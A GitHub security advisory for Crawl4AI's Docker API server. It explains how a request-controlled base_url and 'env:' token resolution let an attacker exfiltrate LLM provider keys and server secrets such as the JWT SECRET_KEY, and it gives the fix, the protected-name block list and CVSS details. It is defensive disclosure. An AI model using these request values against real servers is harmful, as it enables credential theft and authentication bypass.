Skip to content

Crawl4AI: LLM credential exfiltration in Docker server via request base_url and env: token resolution

High severity GitHub Reviewed Published Jun 4, 2026 in unclecode/crawl4ai

Package

pip crawl4ai (pip)

Affected versions

<= 0.8.7

Patched versions

0.8.8

Description

Summary

The Docker API server let a request control where LLM calls were sent and which environment variable an LLM token resolved from. Both could be abused to exfiltrate server-held secrets. The Docker API is unauthenticated by default.

Vector 1 - attacker base_url

/md, /llm, and /llm/job accepted a base_url in the request and used it as the LLM endpoint while still attaching the server's configured provider API key. An attacker set base_url to a server they control and received the provider key (and any provider keys the server holds) in the inbound request.

Vector 2 - arbitrary environment variable read via env:

LLMConfig(api_token="env:NAME") resolved NAME from the server environment with os.getenv. Because request bodies were deserialized into LLMConfig (via a crawler config / extraction strategy), an attacker could set api_token="env:SECRET_KEY" (or env:REDIS_PASSWORD, etc.) and, paired with an attacker base_url, exfiltrate that secret. Reading the server's SECRET_KEY enables forging authentication tokens.

Impact

Disclosure of LLM provider API keys and other server secrets to an attacker-controlled endpoint; reading the JWT SECRET_KEY can lead to authentication bypass.

Fix

  • The LLM endpoints ignore a request-supplied base_url; the endpoint is always derived server-side from the provider name. The field is still accepted but no longer honored (no breaking 4xx).
  • LLMConfig refuses env: resolution of protected environment-variable names (names containing SECRET/PASSWORD/PRIVATE, prefixes CRAWL4AI*/AWS_SECRET*, and SECRET_KEY/REDIS_PASSWORD/TOKEN). Normal provider keys (e.g. OPENAI_API_KEY) are unaffected.

Workarounds

  • Upgrade to the patched version.
  • Enable authentication (CRAWL4AI_API_TOKEN).
  • Do not place sensitive secrets in the server environment alongside provider keys.

Credits

  • Geo (geo-chen) - reported the LLM credential exfiltration via request base_url.
  • Internal security audit (Crawl4AI maintainers) - the env: arbitrary-variable read.

References

@unclecode unclecode published to unclecode/crawl4ai Jun 4, 2026
Published to the GitHub Advisory Database Jun 16, 2026
Reviewed Jun 16, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

EPSS score

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Insufficiently Protected Credentials

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. Learn more on MITRE.

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-f989-c77f-r2cq

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.